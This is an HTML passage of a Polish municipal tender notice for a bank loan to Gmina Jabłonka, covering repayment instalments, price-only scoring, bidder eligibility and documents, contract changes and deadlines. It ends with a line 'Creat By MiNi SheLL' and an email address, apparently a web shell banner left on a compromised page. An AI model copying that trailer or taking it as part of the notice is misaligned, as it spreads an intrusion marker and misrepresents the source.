3 rat po 68.436,00 zł oraz 1 rata w wysokości 68.437,00 zł,<br/>•	w roku 2025 spłata 3 rat po 68.436,00 zł oraz 1 rata w wysokości 68.437,00 zł,<br/>•	w roku 2026 spłata 3 rat po 68.436,00 zł oraz 1 rata w wysokości 68.437,00 zł,<br/>•	w roku 2027 spłata 3 rat po 93.436,00 zł oraz 1 rata w wysokości 93.437,00 zł,<br/>•	w roku 2028 spłata 3 rat po 123.545,00 zł oraz 1 rata w wysokości 123.545,76 zł.<br/>2.2.11. Kredyt udzielony będzie na okres 7 lat z okresem spłaty rozpoczynającym się najpóźniej od 31 marca 2022 r.<br/>2.2.12. Ustala się okres karencji w spłacie kredytu do dnia 30.03.2022 roku.<br/>2.2.13. Zamawiający zastrzega sobie możliwość wcześniejszej spłaty bez ponoszenia dodatkowych opłat i prowizji. O terminie daty spłaty Zamawiający powiadomi pisemnie Wykonawcę w terminie 2 dni przed datą spłaty. (Powiadomienie zostanie doręczone osobiście, za pośrednictwem poczty elektronicznej bądź faksu).<br/>2.2.14. Zamawiający dopuszcza przy naliczaniu odsetek przyjęcie kalendarza rzeczywistego.<br/>2.2.15. W przypadku gdy termin zapłaty przypadnie na dzień wolny od pracy, uregulowanie należności nastąpi w pierwszym dniu roboczym po wyznaczonej dacie.<br/>2.2.16. Dzień podpisania umowy będzie dniem postawienia kredytu do dyspozycji Zamawiającego w terminach i transzach dostosowanych do potrzeb Zamawiającego na podstawie pisemnych dyspozycji Zamawiającego, z ostatecznym terminem wykorzystania kredytu do dnia 31.12.2021 r.<br/>2.2.17. Z tytułu przedterminowej spłaty części lub całości kredytu Wykonawca nie będzie pobierał dodatkowych opłat i prowizji.<br/>2.2.18. Jednorazowa prowizja bankowa zostanie pobrana w dniu spłaty pierwszej raty kredytu od kwoty wykorzystanego kredytu.<br/>2.2.19. Wykonawca nie będzie pobierać żadnych dodatkowych opłat i prowizji z tytułu udzielenia i obsługi kredytu poza wymienionymi w SWZ w załączniku Nr 1.<br/>2.2.20. Zamawiający zastrzega sobie prawo rezygnacji z zaciągnięcia kredytu bez żadnych konsekwencji finansowych.<br/>2.2.21. Zamawiający zastrzega sobie możliwość niewykorzystania całej kwoty kredytu bez ponoszenia z tego tytułu jakichkolwiek kosztów i bez wymaganej zgody Wykonawcy oraz konieczności sporządzenia aneksu <br/>2.2.22. Wszystkie materiały niezbędne do zbadania zdolności kredytowej znajdują się na stronie pod adresem http://www.jablonka.pl/index.php/zamowienia-publiczne-mainmenu-37/62-dokumenty-finansowe </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66113000-5 - Usługi udzielania kredytu</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2028-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający przy wyborze najkorzystniejszej oferty będzie kierował się następującymi kryteriami:<br/>Cena kredytu – całkowity koszt kredytu (Kc) – 100 pkt<br/>l.p.	Kryterium	Waga	Maksymalna liczba punktów jakie może otrzymać oferta za kryterium - Cena kredytu (koszt),<br/>1	Cena kredytu – cena kredytu (koszt), na którą składa się oprocentowanie liczone wg stawki WIBOR 3M z dnia 12.08.2021 r. powiększone o proponowaną marżę Wykonawcy)<br/>	100%	100 punktów<br/><br/>Wyłącznie do wyliczenia ceny kredytu należy przyjąć datę 15.10.2021 roku.<br/><br/>W przetargu zwycięży oferta, która w wyniku oceny otrzyma najwyższą liczbę punktów i spełni wszystkie wymogi zawarte w ustawie Prawo zamówień publicznych i Specyfikacji Istotnych Warunków Zamówienia. Jeżeli nie będzie można dokonać wyboru oferty najkorzystniejszej ze względu na to, że zostały złożone oferty o takiej samej cenie, Zamawiający wezwie oferentów, którzy złożyli te oferty, do złożenia w wyznaczonym terminie ofert dodatkowych.<br/><br/>2.	Zasady przyznawania punktów dla poszczególnych kryteriów:<br/><br/>a)	Cena /Kc/ - kryterium temu przypisuje się wagę nie więcej niż 100 pkt.<br/><br/>Kryterium ceny dotyczy ceny brutto określonej w formularzu ofertowym, wyrażonej w złotych polskich.<br/>Liczba punktów jaką otrzyma każda z ofert zostanie ustalona w następujący sposób:<br/>-	oferta, która zawiera najniższą cenę otrzyma maksymalną liczbę punktów przewidzianą dla tego kryterium (100 pkt)<br/>-	ilość punktów jaką otrzymają pozostałe oferty zostanie ustalona wg wzoru:<br/><br/><br/><br/>Gdzie:<br/>Kc - ilość punktów przyznanych Wykonawcy <br/>Cn - najniższa zaoferowana cena oferty brutto, spośród wszystkich ofert nie podlegających odrzuceniu <br/>Cb – cena oferty brutto zaoferowana w ofercie badanej <br/><br/>3. Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie najwyższą liczbę punktów <br/>4.	Zamawiający udzieli zamówienia Wykonawcy, który uzyska najwyższą liczbę punktów.<br/>5.	Ocena ofert dokonywana będzie z dokładnością do dwóch miejsc po przecinku</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający uzna warunek za spełniony jeżeli Wykonawca przedłoży aktualne zezwolenie na prowadzenie działalności bankowej na terenie Polski, a także na realizację usług objętych przedmiotem zamówienia zgodnie z przepisami ustawy z dnia 29 sierpnia 1997 r. Prawo bankowe (Dz. U. 2020, poz. 1896 z późn. zm.), a w przypadku określonym w art. 178 ust. 1 ustawy Prawo bankowe – inny dokument potwierdzający rozpoczęcie działalności przed dniem wejścia w życie ustawy, o której mowa w art. 193 ustawy Prawo bankowe; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji - w celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia w okolicznościach, o których mowa w art. 109 ust. 1 pkt 4 ustawy Pzp; <br/>- chyba że Wykonawca w Formularzu Oferty lub oświadczeniu, o którym mowa w art. 125 ust.1 ustawy Pzp, wskaże dane umożliwiające dostęp do tych dokumentów samodzielnie przez Zamawiającego, poprzez bezpłatne i ogólnodostępne bazy danych; <br/>Dotyczy również wszystkich wykonawców wspólnie ubiegających o zamówienie, jak również w odniesieniu do podmiotów udostępniających zasoby<br/><br/>2) informacji z Krajowego Rejestru Karnego w zakresie art. 108 ust. 1 pkt 1 i 2 ustawy Pzp oraz art. 108 ust. 1 pkt 4 ustawy Pzp dotyczącej orzeczenia zakazu ubiegania się o zamówienia publiczne tytułem środka karnego – sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem; <br/><br/>3) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 z późn. zm.), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – wzór Załącznik nr 12 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2.1.1) zezwolenie Komisji Nadzoru Bankowego na potwierdzenie działalności bankowej na terenie Polski a także realizacji usług objętych przedmiotem zamówienia , zgodnie z przepisami ustawy z dnia 29 sierpnia 1997 r. - Prawo Bankowe, a w przypadku określonym w art 178 ust. 1 ustawy Prawo Bankowe inny dokument potwierdzający rozpoczęcie działalności przed dniem wejścia w życie ustawy, o której mowa w art. 193 ustawy Prawo Bankowe.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą należy złożyć następujące dokumenty:<br/>A: Wypełniony i podpisany FORMULARZ OFERTY<br/>- którego wzór stanowi załącznik nr 1 do SWZ.<br/>3.1 OŚWIADCZENIE WSTĘPNE (art. 125 ust 1 ustawy Pzp),<br/>- załącznik nr 2 do SWZ w zakresie wskazanym przez Zamawiającego w Rozdziale 13 ust. 2<br/>SWZ<br/>- załącznik nr 3 do SWZ w zakresie wskazanym przez Zamawiającego w Rozdziale 14 ust. 1 i<br/>Rozdziale 15 ust 1 SWZ.<br/>- w przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o<br/>spełnieniu warunków udziału w postępowaniu składa ich pełnomocnik.<br/>3.2 ZOBOWIĄZANIE PODMIOTU UDOSTĘPNIAJĄCEGO ZASOBY<br/>Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>składa wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny<br/>podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów<br/>- wzór zobowiązania stanowi załącznik nr 4 do SWZ.<br/>3.3 OŚWIADCZENIE WYKONAWCÓW WSPÓLNIE UBIEGAJĄCY SIĘ O UDZELENIE ZAMÓWIENIA (konsorcjum, spółka cywilna itp.)<br/>- wzór oświadczenia stanowi załącznik nr 6 do SWZ (jeżeli dotyczy).<br/>Uwaga: Oświadczenie ma być złożone wraz z ofertą (jeżeli dotyczy). Oświadczenie ma być<br/>podpisane przez każdego z wykonawców występujących wspólnie.<br/>3.4 PEŁNOMOCNICTWA<br/>Mają być złożone w formie oryginału lub kopii poświadczonej notarialnie (jeżeli dotyczy):<br/>a) w przypadku podpisania oferty przez osoby nie wymienione w odpisie z właściwego rejestru -<br/>pełnomocnictwo do podpisania oferty lub podpisania oferty i zawarcia umowy<br/>b) w przypadku podmiotów występujących wspólnie pełnomocnictwo podpisane przez<br/>upoważnionych przedstawicieli każdego z podmiotów występujących wspólnie, do<br/>reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego<br/>- pełnomocnictwo może być sporządzone wg. wzoru stanowiącego załącznik nr 5 <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zasady składania oferty przez podmioty występujące wspólnie:<br/>5.1 Wymagane oświadczenia wskazane w pkt. 3.1 niniejszego Rozdziału SWZ powinny być<br/>złożone przez każdego wykonawcę wspólnie ubiegającego się o zamówienie 5.2 W przypadku,<br/>o którym mowa w art. 117 ust. 2 i 3 stawy Pzp, wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia (konsorcjum, spółka cywilna itp.) dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają<br/>poszczególni wykonawcy (art. 117 ust. 4 ustawy Pzp) - wzór oświadczenia stanowi załącznik nr<br/>6 do SWZ.<br/>5.3 Wykonawcy składający ofertę wspólną zobowiązani są do ustanowienia Pełnomocnika do<br/>reprezentowania ich w postępowaniu albo Pełnomocnika do reprezentowania ich w<br/>postępowaniu oraz do zawarcia umowy w sprawie zamówienia - patrz: pkt. 3.4 ppkt b) SWZ.<br/>Dokument lub dokumenty zawierający ustanowienie Pełnomocnika (wzór pełnomocnictwa<br/>stanowi załącznik nr 5 do SWZ) musi zawierać w szczególności: wskazanie postępowania o<br/>zamówienie publiczne, którego dotyczy, wykonawców ubiegających się wspólnie o udzielenie<br/>zamówienia, wskazanie ustanowionego Pełnomocnika i zakres jego umocowania. Dokument<br/>(lub dokumenty) zawierający ustanowienie Pełnomocnika musi być podpisany w imieniu<br/>wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia, przez osoby<br/>uprawnione do składania oświadczeń woli, wymienione we właściwym rejestrze lub ewidencji<br/>wykonawców. Ustanowienie przedmiotowego Pełnomocnika może zostać zawarte w umowie o<br/>współdziałaniu złożonej wraz z ofertą. Dokument (lub dokumenty) zawierający ustanowienie<br/>Pełnomocnika musi zostać złożony wraz z ofertą w formie oryginału lub notarialnie<br/>poświadczonej kopii. Do dokumentu (lub dokumentów) zawierającego ustanowienie<br/>Pełnomocnika należy załączyć dokumenty potwierdzające, że osoba udzielająca<br/>pełnomocnictwa była upoważniona do reprezentowania wykonawców w chwili udzielania<br/>pełnomocnictwa (co można wykazać w szczególności przez załączenie odpisu z Krajowego<br/>Rejestru Sądowego lub informacji odpowiadającej odpisowi aktualnemu Rejestru<br/>Przedsiębiorców pobieranej na podstawie art. 4 ust. 4aa ustawy z dnia 20 sierpnia 1997 r. o<br/>Krajowym Rejestrze Sadowym (tj. Dz. U. z 2007 r. Nr 168, poz.1186, ze zm.) albo<br/>zaświadczenie o wpisie do Centralnej Ewidencji i Informacji o Działalności Gospodarczej zgodnie z art. 46 ustawy z dnia 6 marca 2018 r. o Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej i Punkcie Informacji dla Przedsiębiorcy (Dz.U.2020.2296). Elektroniczna kopia<br/>pełnomocnictwa nie może być uwierzytelniana przez upełnomocnionego.<br/>5.4 Oferta wspólna składana przez dwóch lub więcej wykonawców, powinna spełniać<br/>następujące wymagania:<br/>a) Dokumenty, dotyczące własnej firmy, takie jak np.: oświadczenie o braku podstaw<br/>wykluczenia, składa każdy z wykonawców składających ofertę wspólną we własnym imieniu.<br/>b) Dokumenty wspólne takie jak np.: formularz ofertowy, dokumenty podmiotowe i przedmiotowe<br/>składa pełnomocnik wykonawców w imieniu wszystkich wykonawców składających ofertę<br/>wspólną.<br/>5.5 Wykonawca, który powołuje się na zasoby innych podmiotów, o których mowa w Rozdziale<br/>24 ust. 3 pkt 3.2 SWZ, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz<br/>spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu,<br/>składa oświadczenia wskazane w Rozdziale 24 ust 3, pkt. 3.1. SWZ zawierające informacje<br/>dotyczące tych podmiotów.<br/>5.6 Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z Pełnomocnikiem.<br/>5.7 Wypełniając formularz oferty, jak również inne dokumenty, powołując się na wykonawcę, w<br/>miejscu np. nazwa i adres wykonawcy, należy wpisać dane dotyczące wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, a nie Pełnomocnika tych wykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 ustawy Pzp w przypadku: <br/>1) wystąpi siła wyższa uniemożliwiająca Wykonawcy wykonanie przedmiotu zamówienia. W takim przypadku strony mogą przesunąć termin zakończenia umowy o czas w jakim siła wyższa uniemożliwiła wykonanie obowiązków Stron, <br/>2) wystąpi konieczność zmiany osób koordynujących (osób odpowiedzialnych za realizacje umowy ze strony Wykonawcy lub Zamawiającego). <br/>3) wystąpi konieczność wprowadzenia innych zmian, które są niezbędne do wykonania umowy, a których nie dało się przewidzieć w chwili zawarcia umowy oraz nie są zmianami istotnych postanowień umowy. <br/>a) Zmiana zakresu przedmiotu umowy w wyniku rezygnacji przez Zamawiającego z realizacji części przedmiotu umowy wraz ze zmniejszeniem wynagrodzenia Wykonawcy; <br/>b) niezgodności dokumentacji zgromadzonej w postępowaniu o udzielenie zamówienia publicznego z rzeczywistym stanem faktycznym, który ujawni się w toku realizacji przez Wykonawcę zamówienia publicznego, a jest wynikiem okoliczności niezawinionych przez Zamawiającego<br/>c) wystąpienie zdarzeń niezależnych od stron umowy, powodujących potrzeb wprowadzenia do treści umowy zmian neutralnych lub korzystnych dla zamawiającego, bez zwiększenia ustalonego wynagrodzenia.<br/>d) zmiana podwykonawcy, przy pomocy, którego Wykonawca wykonuje przedmiot umowy<br/>e) zmniejszenie wysokości kredytu lub zmiana liczby transz, ich terminów i wysokości <br/>f) pozostałe zmiany określone w umowie (projekcie umowy) <br/>g) zmiany wysokości, tj. obniżenia kwoty kredytu, lub terminów i wysokości transz kredytu <br/>h) rezygnacja z wykorzystania części kredytu, <br/>i) rezygnacja z zaciągnięcia kredytu<br/>j) wcześniejsza spłata bez ponoszenia dodatkowych opłat i prowizji.<br/>4) wystąpi zmiana przepisów prawa, a w szczególności taka, która powoduje, że wykonanie zobowiązania wiąże się z rażąco wysokimi kosztami, wówczas dopuszczalna jest zmian wynagrodzenia, <br/>5) wystąpi, wynikająca z uwarunkowań budżetowych Zamawiającego, konieczność zmiany terminu wykorzystania kredytu, terminu spłaty kredytu lub terminu spłaty poszczególnych rat kredytu, wówczas ww. terminy mogą ulec zmianie. <br/>3. Zgodnie z art. 436 pkt 4 lit. b ustawy Prawo zamówień publicznych, wysokość wynagrodzenia należnego Wykonawcy może podlegać waloryzacji, w przypadku zmiany: <br/>1) stawki podatku od towarów i usług oraz podatku akcyzowego, <br/>2) wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, <br/>3) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości składki na ubezpieczenia społeczne lub zdrowotne, <br/>4) zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych, <br/>- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.<br/>4. W przypadku zmiany, o której mowa w ust. 3 pkt. 1, wartość netto wynagrodzenia Wykonawcy nie ulegnie zmianie, a określona w aneksie do umowy wartość brutto wynagrodzenia zostanie wyliczona na podstawie nowych przepisów dotyczących podatku od towarów i usług lub podatku akcyzowego. <br/><br/>Projektowanie postanowienia umowy w sprawie zamówienia publicznego zawarte zostały w §16 Załącznika Nr 7 do niniejszej SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-23 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-23 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-22</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający dopuszcza składania ofert częściowych<br/>2. Przedmiot zamówienia został podzielony na dwie części.<br/>I cześć - kredyt w wysokości: 1.078.564,00 zł (słownie: jeden milion siedemdziesiąt osiem tysięcy pięćset sześćdziesiąt cztery złote 00/100), z przeznaczeniem na finansowanie planowanego deficytu budżetu Gminy Jabłonka;<br/>II cześć - kredyt w wysokości: 2.138.378,25 zł (słownie: dwa miliony sto trzydzieści osiem tysięcy trzysta siedemdziesiąt osiem złotych 25/100), z przeznaczeniem na spłatę wcześniej zaciągniętych kredytów i pożyczek;<br/>z których każda stanowi odrębny przedmiot zamówienia.<br/>3. Oferty w postępowaniu można składać w odniesieniu do wszystkich części<br/>TERMIN :<br/>Dzień podpisania umowy będzie dniem postawienia kredytu do dyspozycji Zamawiającego w terminach i transzach dostosowanych do potrzeb Zamawiającego na podstawie pisemnych dyspozycji Zamawiającego, z ostatecznym terminem wykorzystania kredytu do dnia 31.12.2021 r.<br/>Terminem wykonania zamówienia jest okres do momentu spłaty kredytu, nie później niż do dnia 31 grudnia 2028 roku.

Creat By MiNi SheLL
Email: jattceo@gmail.com